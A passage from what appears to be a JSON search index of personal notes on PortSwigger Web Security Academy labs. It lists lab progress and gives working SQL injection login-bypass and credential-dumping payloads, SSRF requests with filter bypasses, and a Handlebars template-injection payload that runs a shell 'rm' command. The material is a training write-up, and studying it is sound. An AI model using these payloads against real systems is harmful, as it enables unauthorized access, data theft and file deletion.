smuggling to capture other users' requests Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to deliver reflected XSS Not solved HTTP request smuggling Practitioner Response queue poisoning via H2.TE request smuggling Not solved HTTP request smuggling Practitioner H2.CL request smuggling Not solved HTTP request smuggling Practitioner HTTP/2 request smuggling via CRLF injection Not solved HTTP request smuggling Practitioner HTTP/2 request splitting via CRLF injection Not solved HTTP request smuggling Practitioner CL.0 request smuggling Not solved HTTP request smuggling Expert Exploiting HTTP request smuggling to perform web cache poisoning Not solved HTTP request smuggling Expert Exploiting HTTP request smuggling to perform web cache deception Not solved HTTP request smuggling Expert Bypassing access controls via HTTP/2 request tunnelling Not solved HTTP request smuggling Expert Web cache poisoning via HTTP/2 request tunnelling Not solved HTTP request smuggling Expert Client-side desync Not solved HTTP request smuggling Expert Browser cache poisoning via client-side desync Not solved HTTP request smuggling Expert Server-side pause-based request smuggling Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#os-command-injection","title":"OS command injection","text":"OS command injection level link Solved OS command injection Apprentice OS command injection, simple case Not solved OS command injection Practitioner Blind OS command injection with time delays Not solved OS command injection Practitioner Blind OS command injection with output redirection Not solved OS command injection Practitioner Blind OS command injection with out-of-band interaction Not solved OS command injection Practitioner Blind OS command injection with out-of-band data exfiltration Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#server-side-template-injection","title":"Server-side template injection","text":"Solution Server-side template injection level link Solved ssti-1 Server-side template injection Practitioner Basic server-side template injection Solved ssti-2 Server-side template injection Practitioner Basic server-side template injection (code context) Solved ssti-3 Server-side template injection Practitioner Server-side template injection using documentation Solved ssti-4 Server-side template injection Practitioner Server-side template injection in an unknown language with a documented exploit Solved ssti-5 Server-side template injection Practitioner Server-side template injection with information disclosure via user-supplied objects Solved ssti-6 Server-side template injection Expert Server-side template injection in a sandboxed environment Solved Server-side template injection Expert Server-side template injection with a custom exploit Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#directory-traversal","title":"Directory traversal","text":"Directory traversal level link Solved Directory traversal Apprentice File path traversal, simple case Not solved Directory traversal Practitioner File path traversal, traversal sequences blocked with absolute path bypass Not solved Directory traversal Practitioner File path traversal, traversal sequences stripped non-recursively Not solved Directory traversal Practitioner File path traversal, traversal sequences stripped with superfluous URL-decode Not solved Directory traversal Practitioner File path traversal, validation of start of path Not solved Directory traversal Practitioner File path traversal, validation of file extension with null byte bypass Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#access-control-vulnerabilities","title":"Access control vulnerabilities","text":"Solution Access control vulnerabilities level link Solved access-1 Access control vulnerabilities Apprentice Unprotected admin functionality Solved access-2 Access control vulnerabilities Apprentice Unprotected admin functionality with unpredictable URL Solved access-3 Access control vulnerabilities Apprentice User role controlled by request parameter Solved access-4 Access control vulnerabilities Apprentice User role can be modified in user profile Solved access-5 Access control vulnerabilities Apprentice User ID controlled by request parameter Solved access-6 Access control vulnerabilities Apprentice User ID controlled by request parameter, with unpredictable user IDs Solved access-7 Access control vulnerabilities Apprentice User ID controlled by request parameter with data leakage in redirect Solved access-8 Access control vulnerabilities Apprentice User ID controlled by request parameter with password disclosure Solved access-9 Access control vulnerabilities Apprentice Insecure direct object references Solved access-10 Access control vulnerabilities Practitioner URL-based access control can be circumvented Solved access-11 Access control vulnerabilities Practitioner Method-based access control can be circumvented Solved access-12 Access control vulnerabilities Practitioner Multi-step process with no access control on one step Solved access-13 Access control vulnerabilities Practitioner Referer-based access control Solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#authentication","title":"Authentication","text":"Authentication level link Solved Authentication Apprentice Username enumeration via different responses Not solved Authentication Apprentice 2FA simple bypass Not solved Authentication Apprentice Password reset broken logic Not solved Authentication Practitioner Username enumeration via subtly different responses Not solved Authentication Practitioner Username enumeration via response timing Not solved Authentication Practitioner Broken brute-force protection, IP block Not solved Authentication Practitioner Username enumeration via account lock Not solved Authentication Practitioner 2FA broken logic Not solved Authentication Practitioner Brute-forcing a stay-logged-in cookie Not solved Authentication Practitioner Offline password cracking Not solved Authentication Practitioner Password reset poisoning via middleware Not solved Authentication Practitioner Password brute-force via password change Not solved Authentication Expert Broken brute-force protection, multiple credentials per request Not solved Authentication Expert 2FA bypass using a brute-force attack Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#websockets","title":"WebSockets","text":"WebSockets level link Solved WebSockets Apprentice Manipulating WebSocket messages to exploit vulnerabilities Not solved WebSockets Practitioner Manipulating the WebSocket handshake to exploit vulnerabilities Not solved WebSockets Practitioner Cross-site WebSocket hijacking Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#web-cache-poisoning","title":"Web cache poisoning","text":"Web cache poisoning level link Solved Web cache poisoning Practitioner Web cache poisoning with an unkeyed header Not solved Web cache poisoning Practitioner Web cache poisoning with an unkeyed cookie Not solved Web cache poisoning Practitioner Web cache poisoning with multiple headers Not solved Web cache poisoning Practitioner Targeted web cache poisoning using an unknown header Not solved Web cache poisoning Practitioner Web cache poisoning via an unkeyed query string Not solved Web cache poisoning Practitioner Web cache poisoning via an unkeyed query parameter Not solved Web cache poisoning Practitioner Parameter cloaking Not solved Web cache poisoning Practitioner Web cache poisoning via a fat GET request Not solved Web cache poisoning Practitioner URL normalization Not solved Web cache poisoning Expert Web cache poisoning to exploit a DOM vulnerability via a cache with strict cacheability criteria Not solved Web cache poisoning Expert Combining web cache poisoning vulnerabilities Not solved Web cache poisoning Expert Cache key injection Not solved Web cache poisoning Expert Internal cache poisoning Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#insecure-deserialization","title":"Insecure deserialization","text":"Insecure deserialization level link Solved Insecure deserialization Apprentice Modifying serialized objects Not solved Insecure deserialization Practitioner Modifying serialized data types Not solved Insecure deserialization Practitioner Using application functionality to exploit insecure deserialization Not solved Insecure deserialization Practitioner Arbitrary object injection in PHP Not solved Insecure deserialization Practitioner Exploiting Java deserialization with Apache Commons Not solved Insecure deserialization Practitioner Exploiting PHP deserialization with a pre-built gadget chain Not solved Insecure deserialization Practitioner Exploiting Ruby deserialization using a documented gadget chain Not solved Insecure deserialization Expert Developing a custom gadget chain for Java deserialization Not solved Insecure deserialization Expert Developing a custom gadget chain for PHP deserialization Not solved Insecure deserialization Expert Using PHAR deserialization to deploy a custom gadget chain Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#information-disclosure","title":"Information disclosure","text":"Information disclosure level link Solved Information disclosure Apprentice Information disclosure in error messages Not solved Information disclosure Apprentice Information disclosure on debug page Not solved Information disclosure Apprentice Source code disclosure via backup files Not solved Information disclosure Apprentice Authentication bypass via information disclosure Not solved Information disclosure Practitioner Information disclosure in version control history Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#business-logic-vulnerabilities","title":"Business logic vulnerabilities","text":"Business logic vulnerabilities level link Solved Business logic vulnerabilities Apprentice Excessive trust in client-side controls Not solved Business logic vulnerabilities Apprentice High-level logic vulnerability Not solved Business logic vulnerabilities Apprentice Inconsistent security controls Not solved Business logic vulnerabilities Apprentice Flawed enforcement of business rules Not solved Business logic vulnerabilities Practitioner Low-level logic flaw Not solved Business logic vulnerabilities Practitioner Inconsistent handling of exceptional input Not solved Business logic vulnerabilities Practitioner Weak isolation on dual-use endpoint Not solved Business logic vulnerabilities Practitioner Insufficient workflow validation Not solved Business logic vulnerabilities Practitioner Authentication bypass via flawed state machine Not solved Business logic vulnerabilities Practitioner Infinite money logic flaw Not solved Business logic vulnerabilities Practitioner Authentication bypass via encryption oracle Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#http-host-header-attacks","title":"HTTP Host header attacks","text":"HTTP Host header attacks level link Solved HTTP Host header attacks Apprentice Basic password reset poisoning Not solved HTTP Host header attacks Apprentice Host header authentication bypass Not solved HTTP Host header attacks Practitioner Web cache poisoning via ambiguous requests Not solved HTTP Host header attacks Practitioner Routing-based SSRF Not solved HTTP Host header attacks Practitioner SSRF via flawed request parsing Not solved HTTP Host header attacks Practitioner Host validation bypass via connection state attack Not solved HTTP Host header attacks Expert Password reset poisoning via dangling markup Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#oauth-authentication","title":"OAuth authentication","text":"OAuth authentication level link Solved OAuth authentication Apprentice Authentication bypass via OAuth implicit flow Not solved OAuth authentication Practitioner Forced OAuth profile linking Not solved OAuth authentication Practitioner OAuth account hijacking via redirect_uri Not solved OAuth authentication Practitioner Stealing OAuth access tokens via an open redirect Not solved OAuth authentication Practitioner SSRF via OpenID dynamic client registration Not solved OAuth authentication Expert Stealing OAuth access tokens via a proxy page Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#file-upload-vulnerabilities","title":"File upload vulnerabilities","text":"File upload vulnerabilities level link Solved File upload vulnerabilities Apprentice Remote code execution via web shell upload Not solved File upload vulnerabilities Apprentice Web shell upload via Content-Type restriction bypass Not solved File upload vulnerabilities Practitioner Web shell upload via path traversal Not solved File upload vulnerabilities Practitioner Web shell upload via extension blacklist bypass Not solved File upload vulnerabilities Practitioner Web shell upload via obfuscated file extension Not solved File upload vulnerabilities Practitioner Remote code execution via polyglot web shell upload Not solved File upload vulnerabilities Expert Web shell upload via race condition Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#jwt","title":"JWT","text":"JWT level link Solved JWT-1 Apprentice JWT authentication bypass via unverified signature Solved JWT-2 Apprentice JWT authentication bypass via flawed signature verification Solved JWT-3 Practitioner JWT authentication bypass via weak signing key Solved JWT-4 Practitioner JWT authentication bypass via jwk header injection Solved JWT-5 Practitioner JWT authentication bypass via jku header injection Solved Practitioner JWT authentication bypass via kid header path traversal Not solved Expert JWT authentication bypass via algorithm confusion Not solved Expert JWT authentication bypass via algorithm confusion with no exposed key Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#essential-skills","title":"Essential skills","text":"Essential skills level link Solved Essential skills Practitioner Discovering vulnerabilities quickly with targeted scanning Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#prototype-pollution","title":"Prototype pollution","text":"Prototype pollution level link Solved Prototype pollution Practitioner DOM XSS via client-side prototype pollution Not solved Prototype pollution Practitioner DOM XSS via an alternative prototype pollution vector Not solved Prototype pollution Practitioner Client-side prototype pollution in third-party libraries Not solved Prototype pollution Practitioner Client-side prototype pollution via browser APIs Not solved Prototype pollution Practitioner Client-side prototype pollution via flawed sanitization Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-sqli/","title":"BurpSuite Labs - SQL injection","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-vulnerability-in-where-clause-allowing-retrieval-of-hidden-data","title":"SQL injection vulnerability in WHERE clause allowing retrieval of hidden data","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation","title":"Enuntiation","text":"

                            This lab contains an\u00a0SQL injection\u00a0vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:

                            SELECT * FROM products WHERE category = 'Gifts' AND released = 1

                            To solve the lab, perform an SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution","title":"Solution","text":"

                            Filter by one of the categories and, in the URL, instead of that categorry, after the \"=\" add:

                            ' OR '1'='1\n
                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-vulnerability-allowing-login-bypass","title":"SQL injection vulnerability allowing login bypass","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_1","title":"Enuntiation","text":"

                            This lab contains an\u00a0SQL injection\u00a0vulnerability in the login function.

                            To solve the lab, perform an SQL injection attack that logs in to the application as the\u00a0administrator\u00a0user.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_1","title":"Solution","text":"

                            In the login page, add to username:

                            administrator'--\n

                            In password it doesn't matter what you write.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-determining-the-number-of-columns-returned-by-the-query","title":"SQL injection UNION attack, determining the number of columns returned by the query","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_2","title":"Enuntiation","text":"

                            This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.

                            To solve the lab, determine the number of columns returned by the query by performing an\u00a0SQL injection UNION\u00a0attack that returns an additional row containing null values.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_2","title":"Solution","text":"

                            In the category filter, filter by 'Gift'. Then in the URL, substitute Gift by:

                            ' OR '1'='1' order by 1-- -\n' OR '1'='1' order by 2-- -\n' OR '1'='1' order by 3-- -\n' OR '1'='1' order by 4-- -\n

                            When substituting by the last string, you will have an error. Bingo! Our last successful try was with 3 columns, so the table is holding 3 columns. Now we can launch our UNION attack:

                            ' OR '1'='1' UNION SELECT all  null,null,null-- -\n

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-finding-a-column-containing-text","title":"SQL injection UNION attack, finding a column containing text","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_3","title":"Enuntiation","text":"

                            This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a\u00a0previous lab. The next step is to identify a column that is compatible with string data.

                            The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform an\u00a0SQL injection UNION\u00a0attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_3","title":"Solution","text":"

                            Select category filter GIFT in the Home lab.

                            Substitute in the URL Gift by the following string to guess which column is being displayed:

                            ' UNION SELECT null,null,null-- -\n

                            The Lab environment is providing at the top of the screen a string of characters that you will need to get reflected in order to pass the lab. In my case it was the string 'FEvLOw'. I tried that string in different positions and I got success in the second position:

                            '+UNION+SELECT+'FEvLOw',NULL,NULL--\n'+UNION+SELECT+NULL,'FEvLOw',NULL--\n

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-retrieving-data-from-other-tables","title":"SQL injection UNION attack, retrieving data from other tables","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_4","title":"Enuntiation","text":"

                            This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.

                            The database contains a different table called\u00a0users, with columns called\u00a0username\u00a0and\u00a0password.

                            To solve the lab, perform an\u00a0SQL injection UNION\u00a0attack that retrieves all usernames and passwords, and use the information to log in as the\u00a0administrator\u00a0user.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_4","title":"Solution","text":"

                            First, we test the number of columns and we obtain 2.

                            Later we run

                            ' UNION SELECT ALL username,password FROM users-- -\n

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-retrieving-multiple-values-in-a-single-column","title":"SQL injection UNION attack, retrieving multiple values in a single column","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_5","title":"Enuntiation","text":"

                            This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

                            The database contains a different table called\u00a0users, with columns called\u00a0username\u00a0and\u00a0password.

                            To solve the lab, perform an\u00a0SQL injection UNION\u00a0attack that retrieves all usernames and passwords, and use the information to log in as the\u00a0administrator\u00a0user.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_5","title":"Solution","text":"

                            Like in the previous lab, first we test how many columns there are:

                            ' UNION SELECT ALL NULL,NULL-- -\n

                            After that we check that (in my case) the column that is reflected is the second one, and we use that to retrieve the users and passwords:

                            ' UNION SELECT NULL,username FROM users-- -\n

                            And we get:

                            carlos\nadministrator\nwiener\n

                            And then, passwords:

                            ' UNION SELECT NULL,password FROM users-- -\n

                            And we get:

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-attack-querying-the-database-type-and-version-on-oracle","title":"SQL injection attack, querying the database type and version on Oracle","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_6","title":"Enuntiation","text":"

                            This lab contains a\u00a0SQL injection\u00a0vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

                            To solve the lab, display the database version string.

                            ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_6","title":"Solution","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-ssrf/","title":"BurpSuite Labs - Server Side Request Forgery","text":"

                            https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#payloads-with-localhost

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#basic-ssrf-against-the-local-server","title":"Basic SSRF against the local server","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation","title":"Enunciation","text":"

                            This lab has a stock check feature which fetches data from an internal system.

                            To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution","title":"Solution","text":"
                            POST /product/stock HTTP/2\nHost: 0a1600f6034ecb0581760c6200e30093.web-security-academy.net\nCookie: session=nQDGMiUWrUCVsa4ZXP4RoToYgd4biWt5\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a1600f6034ecb0581760c6200e30093.web-security-academy.net/product?productId=1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 64\nOrigin: https://0a1600f6034ecb0581760c6200e30093.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http%3A%2F%2Flocalhost%2Fadmin%2Fdelete?username=carlos\n
                            1. Browse to /admin and observe that you can't directly access the admin page.
                            2. Visit a product, click \"Check stock\", intercept the request in Burp Suite, and send it to Burp Repeater.
                            3. Change the URL in the stockApi parameter to http://localhost/admin. This should display the administration interface.
                            4. Read the HTML to identify the URL to delete the target user, which is:

                              http://localhost/admin/delete?username=carlos

                            5. Submit this URL in the stockApi parameter, to deliver the SSRF attack.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#basic-ssrf-against-another-back-end-system","title":"Basic SSRF against another back-end system","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation_1","title":"Enunciation","text":"

                            This lab has a stock check feature which fetches data from an internal system.

                            To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution_1","title":"Solution","text":"

                            Launch a scan request with intruder

                            POST /product/stock HTTP/2\nHost: 0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nCookie: session=ukVLJOQMDp5wqxujhaw2c21t5Xt8XcYq\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net/product?productId=2\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 96\nOrigin: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://192.168.0.\u00a71\u00a7:8080/admin/\n

                            Now we know that the address is http://192.168.0.16:8080/admin/, so we can send the delete request for user carlos.

                            POST /product/stock HTTP/2\nHost: 0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nCookie: session=ukVLJOQMDp5wqxujhaw2c21t5Xt8XcYq\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net/product?productId=2\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 62\nOrigin: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://192.168.0.16:8080/admin/delete?username=carlos\n

                            1. Visit a product, click \"Check stock\", intercept the request in Burp Suite, and send it to Burp Intruder.
                            2. Click \"Clear \u00a7\", change the stockApi parameter to http://192.168.0.1:8080/admin then highlight the final octet of the IP address (the number 1), click \"Add \u00a7\".
                            3. Switch to the Payloads tab, change the payload type to Numbers, and enter 1, 255, and 1 in the \"From\" and \"To\" and \"Step\" boxes respectively.
                            4. Click \"Start attack\".
                            5. Click on the \"Status\" column to sort it by status code ascending. You should see a single entry with a status of 200, showing an admin interface.
                            6. Click on this request, send it to Burp Repeater, and change the path in the stockApi to: /admin/delete?username=carlos
                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#ssrf-with-blacklist-based-input-filters","title":"SSRF with blacklist-based input filters","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation_2","title":"Enunciation","text":"

                            This lab has a stock check feature which fetches data from an internal system.

                            To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

                            The developer has deployed two weak anti-SSRF defenses that you will need to bypass.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution_2","title":"Solution","text":"
                            POST /product/stock HTTP/2\nHost: 0a7700f4041232118111d52d000100ab.web-security-academy.net\nCookie: session=zdzvJtvkFadrRM96wa1vXhMF7G2zfSkN\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a7700f4041232118111d52d000100ab.web-security-academy.net/product?productId=1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 66\nOrigin: https://0a7700f4041232118111d52d000100ab.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://127.1/%25%36%31dmin\n

                            Now we know that we need to use the filters:

                            • 127.1
                            • double url encoding of \"a\" character in the word 'admin.'

                            so we can send the delete request for user carlos.

                            POST /product/stock HTTP/2\nHost: 0a7700f4041232118111d52d000100ab.web-security-academy.net\nCookie: session=zdzvJtvkFadrRM96wa1vXhMF7G2zfSkN\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a7700f4041232118111d52d000100ab.web-security-academy.net/product?productId=1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 66\nOrigin: https://0a7700f4041232118111d52d000100ab.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://127.1/%25%36%31dmin/%25%36%34elete?username=carlos\n

                            1. Visit a product, click \"Check stock\", intercept the request in Burp Suite, and send it to Burp Repeater.
                            2. Change the URL in the stockApi parameter to http://127.0.0.1/ and observe that the request is blocked.
                            3. Bypass the block by changing the URL to: http://127.1/
                            4. Change the URL to http://127.1/admin and observe that the URL is blocked again.
                            5. Obfuscate the \"a\" by double-URL encoding it to %2561 to access the admin interface and delete the target user.
                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#ssrf-with-filter-bypass-via-open-redirection-vulnerability","title":"SSRF with filter bypass via open redirection vulnerability","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation_3","title":"Enunciation","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution_3","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssti/","title":"BurpSuite Labs - Server Side Template Injection","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#basic-server-side-template-injection","title":"Basic server-side template injection","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation","title":"Enunciation","text":"

                            This lab is vulnerable to server-side template injection due to the unsafe construction of an ERB template.

                            To solve the lab, review the ERB documentation to find out how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory.

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution","title":"Solution","text":"

                            Identify an injection point.

                            Test a template injection. From the enunciate we knew it was ERB.

                            Listing root \"/.\"

                            Listing \"/home/carlos.\"

                            Beforehand, we run a whoami.

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#basic-server-side-template-injection-code-context","title":"Basic server-side template injection (code context)","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_1","title":"Enunciation","text":"

                            This lab is vulnerable to server-side template injection due to the way it unsafely uses a Tornado template. To solve the lab, review the Tornado documentation to discover how to execute arbitrary code, then delete the\u00a0morale.txt\u00a0file from Carlos's home directory.

                            You can log in to your own account using the following credentials:\u00a0wiener:peter

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_1","title":"Solution","text":"

                            Afterwards, you need to visit the endpoint where the code gets executed.

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-using-documentation","title":"Server-side template injection using documentation","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_2","title":"Enunciation","text":"

                            This lab is vulnerable to server-side template injection. To solve the lab, identify the template engine and use the documentation to work out how to execute arbitrary code, then delete the\u00a0morale.txt\u00a0file from Carlos's home directory.

                            You can log in to your own account using the following credentials:

                            content-manager:C0nt3ntM4n4g3r

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_2","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-in-an-unknown-language-with-a-documented-exploit","title":"Server-side template injection in an unknown language with a documented exploit","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_3","title":"Enunciation","text":"

                            This lab is vulnerable to server-side template injection. To solve the lab, identify the template engine and find a documented exploit online that you can use to execute arbitrary code, then delete the\u00a0morale.txt\u00a0file from Carlos's home directory.

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_3","title":"Solution","text":"

                            Find out injection point and obtain template engine from stack traces:

                            Search the web for \"Handlebars server-side template injection\". You should find a well-known exploit posted by\u00a0@Zombiehelp54.

                            Url-encode this payload for resolution:

                            {{#with \"s\" as |string|}}\n    {{#with \"e\"}}\n        {{#with split as |conslist|}}\n            {{this.pop}}\n            {{this.push (lookup string.sub \"constructor\")}}\n            {{this.pop}}\n            {{#with string.split as |codelist|}}\n                {{this.pop}}\n                {{this.push \"return require('child_process').exec('rm /home/carlos/morale.txt');\"}}\n                {{this.pop}}\n                {{#each conslist}}\n                    {{#with (string.sub.apply 0 codelist)}}\n                        {{this}}\n                    {{/with}}\n                {{/each}}\n            {{/with}}\n        {{/with}}\n    {{/with}}\n{{/with}}  \n
                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-with-information-disclosure-via-user-supplied-objects","title":"Server-side template injection with information disclosure via user-supplied objects","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_4","title":"Enunciation","text":"

                            This lab is vulnerable to server-side template injection due to the way an object is being passed into the template. This vulnerability can be exploited to access sensitive data.

                            To solve the lab, steal and submit the framework's secret key.

                            You can log in to your own account using the following credentials:

                            content-manager:C0nt3ntM4n4g3r

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_4","title":"Solution","text":"

                            Reading some documentation about settings in django documentation: https://docs.djangoproject.com/en/5.0/ref/settings/#secret-key

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-in-a-sandboxed-environment","title":"Server-side template injection in a sandboxed environment","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_5","title":"Enunciation","text":"

